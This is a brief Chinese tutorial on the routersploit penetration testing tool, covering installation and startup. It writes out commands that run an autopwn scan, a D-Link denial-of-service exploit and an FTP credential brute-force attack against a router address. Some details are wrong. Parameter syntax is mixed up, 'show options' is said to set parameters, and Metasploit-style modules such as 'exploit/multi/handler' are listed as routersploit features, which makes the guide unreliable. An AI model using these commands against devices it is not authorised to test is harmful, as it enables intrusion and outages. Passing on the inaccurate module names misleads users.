如何使用 routersploit

什么是 routersploit

routersploit 是一个开源的自动化渗透测试工具，旨在找到和利用路由器等网络设备的漏洞。

安装 routersploit

routersploit 的安装需要 Python 3.5 或以上版本。

通过 pip 安装 routersploit：

pip install routersploit

如果安装出现问题，建议使用 virtualenv 创建一个单独的 Python 环境，并在该环境中安装 routersploit。

使用 routersploit

启动 routersploit

在终端中使用以下命令启动 routersploit：

rsf

启动后可以看到 routersploit 的命令行界面。

扫描模块

routersploit 提供了许多模块来扫描网络设备。使用 use 命令来选择一个模块。

use scanners/autopwn

然后使用 show options 命令来设置模块所需的参数：

set target RHOSTS 192.168.1.1
run

攻击模块

routersploit 提供了许多模块来攻击网络设备。选择一个攻击模块和设置参数的方式与扫描模块相同。

use exploits/routers/dlink/dir_815_dos

设置参数：

set target RHOST 192.168.1.1
run

提取模块

使用 routersploit 的提取模块可以从设备中提取有用的信息。

use creds/generic/ftp_bruteforce
set target RHOSTS 192.168.1.1
set user_list users.txt
set pass_list passwords.txt
run

其他功能

除了上面提到的模块外，routersploit 还提供了许多其他功能：

• show modules：列出可用的模块。
• show advanced：显示模块的高级选项。
• use auxiliary/server/http_server：启动一个简单的 HTTP 服务器来传输文件。
• use exploit/multi/handler：启动一个生成 payload 的监听器。
• ...

结论

routersploit 是一个功能强大的自动化渗透测试工具，具有丰富的模块库和灵活的操作界面。通过上述介绍，我们已经可以基本掌握 routersploit 的使用方法了。